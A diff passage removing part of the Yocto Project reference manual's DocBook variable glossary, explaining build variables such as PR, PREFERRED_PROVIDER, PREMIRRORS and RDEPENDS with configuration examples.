-                    class, which is inherited globally.
-                </para>
-
-                <para>
-                    To prevent a recipe from being built, use the
-                    <filename>PNBLACKLIST</filename> variable in your
-                    <filename>local.conf</filename> file.
-                    Here is an example that prevents
-                    <filename>myrecipe</filename> from being built:
-                    <literallayout class='monospaced'>
-     PNBLACKLIST[myrecipe] = "Not supported by our organization."
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-POPULATE_SDK_POST_HOST_COMMAND'><glossterm>POPULATE_SDK_POST_HOST_COMMAND</glossterm>
-            <info>
-                POPULATE_SDK_POST_HOST_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system has created host part of the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call once the
-                    OpenEmbedded build system has created the host part of
-                    the SDK.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     POPULATE_SDK_POST_HOST_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass the SDK path to a command
-                    within a function, you can use
-                    <filename>${SDK_DIR}</filename>, which points to
-                    the parent directory used by the OpenEmbedded build
-                    system when creating SDK output.
-                    See the
-                    <link linkend='var-SDK_DIR'><filename>SDK_DIR</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-POPULATE_SDK_POST_TARGET_COMMAND'><glossterm>POPULATE_SDK_POST_TARGET_COMMAND</glossterm>
-            <info>
-                POPULATE_SDK_POST_TARGET_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system has created target part of the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call once the
-                    OpenEmbedded build system has created the target part of
-                    the SDK.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     POPULATE_SDK_POST_TARGET_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass the SDK path to a command
-                    within a function, you can use
-                    <filename>${SDK_DIR}</filename>, which points to
-                    the parent directory used by the OpenEmbedded build
-                    system when creating SDK output.
-                    See the
-                    <link linkend='var-SDK_DIR'><filename>SDK_DIR</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PR'><glossterm>PR</glossterm>
-            <info>
-                PR[doc] = "The revision of the recipe. The default value for this variable is 'r0'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The revision of the recipe. The default value for this
-                    variable is "r0".
-                    Subsequent revisions of the recipe conventionally have the
-                    values "r1", "r2", and so forth.
-                    When
-                    <link linkend='var-PV'><filename>PV</filename></link>
-                    increases, <filename>PR</filename> is conventionally reset
-                    to "r0".
-                    <note>
-                        The OpenEmbedded build system does not need the aid of
-                        <filename>PR</filename> to know when to rebuild a
-                        recipe.
-                        The build system uses the task
-                        <ulink url='&YOCTO_DOCS_OM_URL;#overview-checksums'>input checksums</ulink>
-                        along with the
-                        <link linkend='structure-build-tmp-stamps'>stamp</link>
-                        and
-                        <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>shared state cache</ulink>
-                        mechanisms.
-                    </note>
-                    The <filename>PR</filename> variable primarily becomes
-                    significant when a package manager dynamically installs
-                    packages on an already built image.
-                    In this case, <filename>PR</filename>, which is the default
-                    value of
-                    <link linkend='var-PKGR'><filename>PKGR</filename></link>,
-                    helps the package manager distinguish which package is the
-                    most recent one in cases where many packages have the same
-                    <filename>PV</filename> (i.e. <filename>PKGV</filename>).
-                    A component having many packages with the same
-                    <filename>PV</filename> usually means that the packages all
-                    install the same upstream version, but with later
-                    (<filename>PR</filename>) version packages including
-                    packaging fixes.
-                    <note>
-                        <filename>PR</filename> does not need to be increased
-                        for changes that do not change the package contents or
-                        metadata.
-                    </note>
-                    Because manually managing <filename>PR</filename> can be
-                    cumbersome and error-prone, an automated solution exists.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#working-with-a-pr-service'>Working With a PR Service</ulink>"
-                    section in the Yocto Project Development Tasks Manual
-                    for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PREFERRED_PROVIDER'><glossterm>PREFERRED_PROVIDER</glossterm>
-            <info>
-                PREFERRED_PROVIDER[doc] = "If multiple recipes provide an item, this variable determines which recipe should be given preference."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If multiple recipes provide the same item, this variable
-                    determines which recipe is preferred and thus provides
-                    the item (i.e. the preferred provider).
-                    You should always suffix this variable with the name of the
-                    provided item.
-                    And, you should define the variable using the preferred
-                    recipe's name
-                    (<link linkend='var-PN'><filename>PN</filename></link>).
-                    Here is a common example:
-                    <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
-                    </literallayout>
-                    In the previous example, multiple recipes are providing
-                    "virtual/kernel".
-                    The <filename>PREFERRED_PROVIDER</filename> variable is
-                    set with the name (<filename>PN</filename>) of the recipe
-                    you prefer to provide "virtual/kernel".
-                </para>
-
-                <para>
-                    Following are more examples:
-                    <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_virtual/xserver = "xserver-xf86"
-     PREFERRED_PROVIDER_virtual/libgl ?= "mesa"
-                    </literallayout>
-                    For more information, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#metadata-virtual-providers'>Using Virtual Providers</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    <note>
-                        If you use a <filename>virtual/*</filename> item
-                        with <filename>PREFERRED_PROVIDER</filename>, then any
-                        recipe that
-                        <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
-                        that item but is not selected (defined) by
-                        <filename>PREFERRED_PROVIDER</filename> is prevented
-                        from building, which is usually desirable since this
-                        mechanism is designed to select between mutually
-                        exclusive alternative providers.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PREFERRED_VERSION'><glossterm>PREFERRED_VERSION</glossterm>
-            <info>
-                PREFERRED_VERSION[doc] = "If there are multiple versions of recipes available, this variable determines which recipe should be given preference."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If multiple versions of recipes exist, this
-                    variable determines which version is given preference.
-                    You must always suffix the variable with the
-                    <link linkend='var-PN'><filename>PN</filename></link>
-                    you want to select, and you should set the
-                    <link linkend='var-PV'><filename>PV</filename></link>
-                    accordingly for precedence.
-                </para>
-
-                <para>
-                    The <filename>PREFERRED_VERSION</filename> variable
-                    supports limited wildcard use through the
-                    "<filename>%</filename>" character.
-                    You can use the character to match any number of
-                    characters, which can be useful when specifying versions
-                    that contain long revision numbers that potentially change.
-                    Here are two examples:
-                    <literallayout class='monospaced'>
-     PREFERRED_VERSION_python = "3.4.0"
-     PREFERRED_VERSION_linux-yocto = "5.0%"
-                    </literallayout>
-                    <note><title>Important</title>
-                        The use of the "<filename>%</filename>" character
-                        is limited in that it only works at the end of the
-                        string.
-                        You cannot use the wildcard character in any other
-                        location of the string.
-                    </note>
-                </para>
-
-                <para>
-                    The specified version is matched against
-                    <link linkend='var-PV'><filename>PV</filename></link>,
-                    which does not necessarily match the version part of
-                    the recipe's filename.
-                    For example, consider two recipes
-                    <filename>foo_1.2.bb</filename> and
-                    <filename>foo_git.bb</filename> where
-                    <filename>foo_git.bb</filename> contains the following
-                    assignment:
-                    <literallayout class='monospaced'>
-     PV = "1.1+git${SRCPV}"
-                    </literallayout>
-                    In this case, the correct way to select
-                    <filename>foo_git.bb</filename> is by using an
-                    assignment such as the following:
-                    <literallayout class='monospaced'>
-     PREFERRED_VERSION_foo = "1.1+git%"
-                    </literallayout>
-                    Compare that previous example against the following
-                    incorrect example, which does not work:
-                    <literallayout class='monospaced'>
-     PREFERRED_VERSION_foo = "git"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Sometimes the <filename>PREFERRED_VERSION</filename>
-                    variable can be set by configuration files in a way that
-                    is hard to change.
-                    You can use
-                    <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
-                    to set a machine-specific override.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     PREFERRED_VERSION_linux-yocto_qemux86 = "5.0%"
-                    </literallayout>
-                    Although not recommended, worst case, you can also use the
-                    "forcevariable" override, which is the strongest override
-                    possible.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     PREFERRED_VERSION_linux-yocto_forcevariable = "5.0%"
-                    </literallayout>
-                    <note>
-                        The <filename>_forcevariable</filename> override is
-                        not handled specially.
-                        This override only works because the default value of
-                        <filename>OVERRIDES</filename> includes
-                        "forcevariable".
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PREMIRRORS'><glossterm>PREMIRRORS</glossterm>
-            <info>
-                PREMIRRORS[doc] = "Specifies additional paths from which the OpenEmbedded build system gets source code."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies additional paths from which the OpenEmbedded
-                    build system gets source code.
-                    When the build system searches for source code, it first
-                    tries the local download directory.
-                    If that location fails, the build system tries locations
-                    defined by <filename>PREMIRRORS</filename>, the upstream
-                    source, and then locations specified by
-                    <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link>
-                    in that order.
-                </para>
-
-                <para>
-                    Assuming your distribution
-                    (<link linkend='var-DISTRO'><filename>DISTRO</filename></link>)
-                    is "poky", the default value for
-                    <filename>PREMIRRORS</filename> is defined in the
-                    <filename>conf/distro/poky.conf</filename> file in the
-                    <filename>meta-poky</filename> Git repository.
-                </para>
-
-                <para>
-                    Typically, you could add a specific server for the
-                    build system to attempt before any others by adding
-                    something like the following to the
-                    <filename>local.conf</filename> configuration file in the
-                    <link linkend='build-directory'>Build Directory</link>:
-                    <literallayout class='monospaced'>
-     PREMIRRORS_prepend = "\
-     git://.*/.* http://www.yoctoproject.org/sources/ \n \
-     ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
-     http://.*/.* http://www.yoctoproject.org/sources/ \n \
-     https://.*/.* http://www.yoctoproject.org/sources/ \n"
-                    </literallayout>
-                    These changes cause the build system to intercept
-                    Git, FTP, HTTP, and HTTPS requests and direct them to
-                    the <filename>http://</filename> sources mirror.
-                    You can use <filename>file://</filename> URLs to point
-                    to local directories or network shares as well.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PRIORITY'><glossterm>PRIORITY</glossterm>
-            <info>
-                PRIORITY[doc] = "Indicates the importance of a package.  The default value is 'optional'.  Other standard values are 'required', 'standard', and 'extra'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Indicates the importance of a package.
-                </para>
-
-                <para>
-                    <filename>PRIORITY</filename> is considered to be part of
-                    the distribution policy because the importance of any given
-                    recipe depends on the purpose for which the distribution
-                    is being produced.
-                    Thus, <filename>PRIORITY</filename> is not normally set
-                    within recipes.
-                </para>
-
-                <para>
-                    You can set <filename>PRIORITY</filename> to "required",
-                    "standard", "extra", and "optional", which is the default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PRIVATE_LIBS'><glossterm>PRIVATE_LIBS</glossterm>
-            <info>
-                PRIVATE_LIBS[doc] = "Specifies libraries installed within a recipe that should be ignored by the OpenEmbedded build system's shared library resolver."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies libraries installed within a recipe that
-                    should be ignored by the OpenEmbedded build system's
-                    shared library resolver.
-                    This variable is typically used when software being
-                    built by a recipe has its own private versions of a
-                    library normally provided by another recipe.
-                    In this case, you would not want the package containing
-                    the private libraries to be set as a dependency on other
-                    unrelated packages that should instead depend on the
-                    package providing the standard version of the library.
-                </para>
-
-                <para>
-                    Libraries specified in this variable should be specified
-                    by their file name.
-                    For example, from the Firefox recipe in meta-browser:
-                    <literallayout class='monospaced'>
-     PRIVATE_LIBS = "libmozjs.so \
-                     libxpcom.so \
-                     libnspr4.so \
-                     libxul.so \
-                     libmozalloc.so \
-                     libplc4.so \
-                     libplds4.so"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For more information, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PROVIDES'><glossterm>PROVIDES</glossterm>
-            <info>
-                PROVIDES[doc] = "A list of aliases that a recipe also provides. These aliases are useful for satisfying dependencies of other recipes during the build as specified by DEPENDS."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of aliases by which a particular recipe can be
-                    known.
-                    By default, a recipe's own
-                    <filename><link linkend='var-PN'>PN</link></filename>
-                    is implicitly already in its <filename>PROVIDES</filename>
-                    list and therefore does not need to mention that it provides itself.
-                    If a recipe uses <filename>PROVIDES</filename>, the
-                    additional aliases are synonyms for the recipe and can
-                    be useful for satisfying dependencies of other recipes during
-                    the build as specified by
-                    <filename><link linkend='var-DEPENDS'>DEPENDS</link></filename>.
-                </para>
-
-                <para>
-                    Consider the following example
-                    <filename>PROVIDES</filename> statement from the recipe
-                    file <filename>eudev_3.2.9.bb</filename>:
-                    <literallayout class='monospaced'>
-     PROVIDES = "udev"
-                    </literallayout>
-                    The <filename>PROVIDES</filename> statement results in
-                    the "eudev" recipe also being available as simply "udev".
-
-                    <note>
-                        Given that a recipe's own recipe name is already
-                        implicitly in its own <filename>PROVIDES</filename> list,
-                        it is unnecessary to add aliases with the "+=" operator;
-                        using a simple assignment will be sufficient. In other
-                        words, while you could write:
-                        <literallayout class='monospaced'>
-     PROVIDES += "udev"
-                        </literallayout>
-                        in the above, the "+=" is overkill and unnecessary.
-                    </note>
-                </para>
-
-                <para>
-                    In addition to providing recipes under alternate names,
-                    the <filename>PROVIDES</filename> mechanism is also used
-                    to implement virtual targets.
-                    A virtual target is a name that corresponds to some
-                    particular functionality (e.g. a Linux kernel).
-                    Recipes that provide the functionality in question list the
-                    virtual target in <filename>PROVIDES</filename>.
-                    Recipes that depend on the functionality in question can
-                    include the virtual target in <filename>DEPENDS</filename>
-                    to leave the choice of provider open.
-                </para>
-
-                <para>
-                    Conventionally, virtual targets have names on the form
-                    "virtual/function" (e.g. "virtual/kernel").
-                    The slash is simply part of the name and has no
-                    syntactical significance.
-                </para>
-
-                <para>
-                    The
-                    <link linkend='var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></link>
-                    variable is used to select which particular recipe
-                    provides a virtual target.
-                    <note>
-                        <para>A corresponding mechanism for virtual runtime
-                        dependencies (packages) exists.
-                        However, the mechanism does not depend on any special
-                        functionality beyond ordinary variable assignments.
-                        For example,
-                        <filename>VIRTUAL-RUNTIME_dev_manager</filename>
-                        refers to the package of the component that manages
-                        the <filename>/dev</filename> directory.</para>
-
-                        <para>Setting the "preferred provider" for runtime
-                        dependencies is as simple as using the following
-                        assignment in a configuration file:</para>
-                        <literallayout class='monospaced'>
-     VIRTUAL-RUNTIME_dev_manager = "udev"
-                        </literallayout>
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PRSERV_HOST'><glossterm>PRSERV_HOST</glossterm>
-            <info>
-                PRSERV_HOST[doc] = "The network based PR service host and port."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The network based
-                    <link linkend='var-PR'><filename>PR</filename></link>
-                    service host and port.
-                </para>
-
-                <para>
-                    The <filename>conf/local.conf.sample.extended</filename>
-                    configuration file in the
-                    <link linkend='source-directory'>Source Directory</link>
-                    shows how the <filename>PRSERV_HOST</filename> variable is
-                    set:
-                    <literallayout class='monospaced'>
-     PRSERV_HOST = "localhost:0"
-                    </literallayout>
-                    You must set the variable if you want to automatically
-                    start a local
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#working-with-a-pr-service'>PR service</ulink>.
-                    You can set <filename>PRSERV_HOST</filename> to other
-                    values to use a remote PR service.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PTEST_ENABLED'><glossterm>PTEST_ENABLED</glossterm>
-            <info>
-                PRSERV_HOST[doc] = "Specifies whether or not Package Test (ptest) functionality is enabled when building a recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies whether or not
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Package Test</ulink>
-                    (ptest) functionality is enabled when building a recipe.
-                    You should not set this variable directly.
-                    Enabling and disabling building Package Tests
-                    at build time should be done by adding "ptest" to (or
-                    removing it from)
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
-                 </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PV'><glossterm>PV</glossterm>
-            <info>
-                PV[doc] = "The version of the recipe. The version is normally extracted from the recipe filename."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The version of the recipe.
-                    The version is normally extracted from the recipe filename.
-                    For example, if the recipe is named
-                    <filename>expat_2.0.1.bb</filename>, then the default value
-                    of <filename>PV</filename> will be "2.0.1".
-                    <filename>PV</filename> is generally not overridden within
-                    a recipe unless it is building an unstable (i.e.
-                    development) version from a source code repository
-                    (e.g. Git or Subversion).
-                 </para>
-
-                 <para>
-                     <filename>PV</filename> is the default value of the
-                     <link linkend='var-PKGV'><filename>PKGV</filename></link>
-                     variable.
-                 </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PYTHON_ABI'><glossterm>PYTHON_ABI</glossterm>
-            <info>
-                PYTHON_ABI[doc] = "When used by recipes that inherit the distutils3, setuptools3, distutils, or setuptools classes, denotes the Application Binary Interface (ABI) currently in use for Python."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When used by recipes that inherit the
-                    <link linkend='ref-classes-distutils3'><filename>distutils3</filename></link>,
-                    <link linkend='ref-classes-setuptools3'><filename>setuptools3</filename></link>,
-                    <link linkend='ref-classes-distutils'><filename>distutils</filename></link>,
-                    or
-                    <link linkend='ref-classes-setuptools'><filename>setuptools</filename></link>
-                    classes, denotes the Application Binary Interface (ABI)
-                    currently in use for Python.
-                    By default, the ABI is "m".
-                    You do not have to set this variable as the OpenEmbedded
-                    build system sets it for you.
-                </para>
-
-                <para>
-                    The OpenEmbedded build system uses the ABI to construct
-                    directory names used when installing the Python headers
-                    and libraries in sysroot
-                    (e.g. <filename>.../python3.3m/...</filename>).
-                </para>
-
-                <para>
-                    Recipes that inherit the <filename>distutils</filename>
-                    class during cross-builds also use this variable to
-                    locate the headers and libraries of the appropriate Python
-                    that the extension is targeting.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PYTHON_PN'><glossterm>PYTHON_PN</glossterm>
-            <info>
-                PYTHON_PN[doc] = "When used by recipes that inherit the distutils3, setuptools3, distutils, or setuptools classes, specifies the major Python version being built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When used by recipes that inherit the
-                    <link linkend='ref-classes-distutils3'><filename>distutils3</filename></link>,
-                    <link linkend='ref-classes-setuptools3'><filename>setuptools3</filename></link>,
-                    <link linkend='ref-classes-distutils'><filename>distutils</filename></link>,
-                    or
-                    <link linkend='ref-classes-setuptools'><filename>setuptools</filename></link>
-                    classes, specifies the major Python version being built.
-                    For Python 3.x, <filename>PYTHON_PN</filename> would be
-                    "python3".
-                    You do not have to set this variable as the
-                    OpenEmbedded build system automatically sets it for you.
-                </para>
-
-                <para>
-                    The variable allows recipes to use common infrastructure
-                    such as the following:
-                    <literallayout class='monospaced'>
-     DEPENDS += "${PYTHON_PN}-native"
-                    </literallayout>
-                    In the previous example, the version of the dependency
-                    is <filename>PYTHON_PN</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-r'><title>R</title>
-
-        <glossentry id='var-RANLIB'><glossterm>RANLIB</glossterm>
-            <info>
-                RANLIB[doc] = "Minimal command and arguments to run 'ranlib'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments to run
-                    <filename>ranlib</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-RCONFLICTS'><glossterm>RCONFLICTS</glossterm>
-            <info>
-                RCONFLICTS[doc] = "The list of packages that conflict with another package. Note that the package will not be installed if the conflicting packages are not first removed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The list of packages that conflict with packages.
-                    Note that packages will not be installed if conflicting
-                    packages are not first removed.
-                </para>
-
-                <para>
-                   Like all package-controlling variables, you must always use
-                   them in conjunction with a package name override.
-                   Here is an example:
-                   <literallayout class='monospaced'>
-     RCONFLICTS_${PN} = "<replaceable>another_conflicting_package_name</replaceable>"
-                   </literallayout>
-                </para>
-
-                <para>
-                    BitBake, which the OpenEmbedded build system uses, supports
-                    specifying versioned dependencies.
-                    Although the syntax varies depending on the packaging
-                    format, BitBake hides these differences from you.
-                    Here is the general syntax to specify versions with
-                    the <filename>RCONFLICTS</filename> variable:
-                    <literallayout class='monospaced'>
-     RCONFLICTS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
-                    </literallayout>
-                    For <filename>operator</filename>, you can specify the
-                    following:
-                    <literallayout class='monospaced'>
-     =
-     &lt;
-     &gt;
-     &lt;=
-     &gt;=
-                    </literallayout>
-                    For example, the following sets up a dependency on version
-                    1.2 or greater of the package <filename>foo</filename>:
-                    <literallayout class='monospaced'>
-     RCONFLICTS_${PN} = "foo (>= 1.2)"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-RDEPENDS'><glossterm>RDEPENDS</glossterm>
-            <info>
-                RDEPENDS[doc] = "Lists runtime dependencies of a package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists runtime dependencies of a package.
-                    These dependencies are other packages that must be
-                    installed in order for the package to function correctly.
-                    As an example, the following assignment declares that the
-                    package <filename>foo</filename> needs the packages
-                    <filename>bar</filename> and <filename>baz</filename> to
-                    be installed:
-                    <literallayout class='monospaced'>
-     RDEPENDS_foo = "bar baz"
-                    </literallayout>
-                    The most common types of package runtime dependencies are
-                    automatically detected and added.
-                    Therefore, most recipes do not need to set
-                    <filename>RDEPENDS</filename>.
-                    For more information, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                </para>
-
-                <para>
-                    The practical effect of the above
-                    <filename>RDEPENDS</filename> assignment is that
-                    <filename>bar</filename> and <filename>baz</filename>
-                    will be declared as dependencies inside the package
-                    <filename>foo</filename> when it is written out by one of
-                    the
-                    <link linkend='ref-tasks-package_write_deb'><filename>do_package_write_*</filename></link>
-                    tasks.
-                    Exactly how this is done depends on which package format
-                    is used, which is determined by
-                    <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>.
-                    When the corresponding package manager installs the
-                    package, it will know to also install the packages on
-                    which it depends.
-                </para>
-
-                <para>
-                    To ensure that the packages <filename>bar</filename> and
-                    <filename>baz</filename> get built, the previous
-                    <filename>RDEPENDS</filename> assignment also causes a task
-                    dependency to be added.
-                    This dependency is from the recipe's
-                    <link linkend='ref-tasks-build'><filename>do_build</filename></link>
-                    (not to be confused with
-                    <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>)
-                    task to the <filename>do_package_write_*</filename>
-                    task of the recipes that build <filename>bar</filename> and
-                    <filename>baz</filename>.
-                </para>
-
-                <para>
-                    The names of the packages you list within
-                    <filename>RDEPENDS</filename> must be the names of other
-                    packages - they cannot be recipe names.
-                    Although package names and recipe names usually match,
-                    the important point here is that you are
-                    providing package names within the
-                    <filename>RDEPENDS</filename> variable.
-                    For an example of the default list of packages created from
-                    a recipe, see the
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-                    variable.
-                </para>
-
-                <para>
-                    Because the <filename>RDEPENDS</filename> variable applies
-                    to packages being built, you should always use the variable
-                    in a form with an attached package name (remember that a
-                    single recipe can build multiple packages).
-                    For example, suppose you are building a development package
-                    that depends on the <filename>perl</filename> package.
-                    In this case, you would use the following
-                    <filename>RDEPENDS</filename> statement:
-                    <literallayout class='monospaced'>
-     RDEPENDS_${PN}-dev += "perl"
-                    </literallayout>
-                    In the example, the development package depends on
-                    the <filename>perl</filename> package.
-                    Thus, the <filename>RDEPENDS</filename> variable has the
-                    <filename>${PN}-dev</filename> package name as part of the
-                    variable.
-                    <note>
-                        <title>Caution</title>
-                        <filename>RDEPENDS_${PN}-dev</filename> includes
-                        <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>
-                        by default.
-                        This default is set in the BitBake configuration file
-                        (<filename>meta/conf/bitbake.conf</filename>).
-                        Be careful not to accidentally remove
-                        <filename>${PN}</filename> when modifying
-                        <filename>RDEPENDS_${PN}-dev</filename>.
-                        Use the "+=" operator rather than the "=" operator.
-                    </note>
-                </para>
-
-                <para>
-                    The package names you use with
-                    <filename>RDEPENDS</filename> must appear as they would in
-                    the <filename>PACKAGES</filename> variable.
-                    The
-                    <link linkend='var-PKG'><filename>PKG</filename></link>
-                    variable allows a different name to be used for
-                    the final package (e.g. the
-                    <link linkend='ref-classes-debian'><filename>debian</filename></link>
-                    class uses this to rename packages), but this final package
-                    name cannot be used with <filename>RDEPENDS</filename>,
-                    which makes sense as <filename>RDEPENDS</filename> is meant
-                    to be independent of the package format used.
-                </para>
-
-                <para>
-                    BitBake, which the OpenEmbedded build system uses, supports
-                    specifying versioned dependencies.
-                    Although the syntax varies depending on the packaging
-                    format, BitBake hides these differences from you.
-                    Here is the general syntax to specify versions with
-                    the <filename>RDEPENDS</filename> variable:
-                    <literallayout class='monospaced'>
-     RDEPENDS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
-                    </literallayout>
-                    For <replaceable>operator</replaceable>, you can specify the
-                    following:
-                    <literallayout class='monospaced'>
-     =
-     &lt;
-     &gt;
-     &lt;=
-     &gt;=
-                    </literallayout>
-                    For <replaceable>version</replaceable>, provide the version
-                    number.
-                    <note><title>Tip</title>
-                        You can use
-                        <link linkend='var-EXTENDPKGV'><filename>EXTENDPKGV</filename></link>
-                        to provide a full package version specification.
-                    </note>
-                    For example, the following sets up a dependency on version
-                    1.2 or greater of the package <filename>foo</filename>:
-                    <literallayout class='monospaced'>
-     RDEPENDS_${PN} = "foo (>= 1.2)"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For information on build-time dependencies, see the
-                    <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
-                    variable.
-                    You can also see the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#tasks'>Tasks</ulink>" and
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#dependencies'>Dependencies</ulink>"
-                    sections in the BitBake User Manual for additional
-                    information on tasks and dependencies.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-REQUIRED_DISTRO_FEATURES'><glossterm>REQUIRED_DISTRO_FEATURES</glossterm>
-            <info>
-                REQUIRED_DISTRO_FEATURES[doc] = "When a recipe inherits the distro_features_check class, this variable identifies distribution features that must exist in the current configuration in order for the OpenEmbedded build system to build the recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-distro_features_check'><filename>distro_features_check</filename></link>
-                    class, this
-                    variable identifies distribution features that must
-                    exist in the current configuration in order for the
-                    OpenEmbedded build system to build the recipe.
-                    In other words, if the
-                    <filename>REQUIRED_DISTRO_FEATURES</filename> variable
-                    lists a feature that does not appear in
-                    <filename>DISTRO_FEATURES</filename> within the
-                    current configuration, an error occurs and the
-                    build stops.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-RM_WORK_EXCLUDE'><glossterm>RM_WORK_EXCLUDE</glossterm>
-            <info>
-                RM_WORK_EXCLUDE[doc] = "With rm_work enabled, this variable specifies a list of packages whose work directories should not be removed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    With <filename>rm_work</filename> enabled, this
-                    variable specifies a list of recipes whose work directories
-                    should not be removed.
-                    See the "<link linkend='ref-classes-rm-work'><filename>rm_work.bbclass</filename></link>"
-                    section for more details.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ROOT_HOME'><glossterm>ROOT_HOME</glossterm>
-            <info>
-                ROOT_HOME[doc] = "Defines the root home directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the root home directory.
-                    By default, this directory is set as follows in the
-                    BitBake configuration file:
-                    <literallayout class='monospaced'>
-     ROOT_HOME ??= "/home/root"
-                    </literallayout>
-                    <note>
-                        This default value is likely used because some
-                        embedded solutions prefer to have a read-only root
-                        filesystem and prefer to keep writeable data in one
-                        place.
-                    </note>
-                </para>
-
-                <para>
-                    You can override the default by setting the variable
-                    in any layer or in the <filename>local.conf</filename> file.
-                    Because the default is set using a "weak" assignment
-                    (i.e. "??="), you can use either of the following forms
-                    to define your override:
-                    <literallayout class='monospaced'>
-     ROOT_HOME = "/root"
-     ROOT_HOME ?= "/root"
-                    </literallayout>
-                    These override examples use <filename>/root</filename>,
-                    which is probably the most commonly used override.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ROOTFS'><glossterm>ROOTFS</glossterm>
-            <info>
-                ROOTFS[doc] = "Indicates a filesystem image to include as the root filesystem."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Indicates a filesystem image to include as the root
-                    filesystem.
-                </para>
-
-                <para>
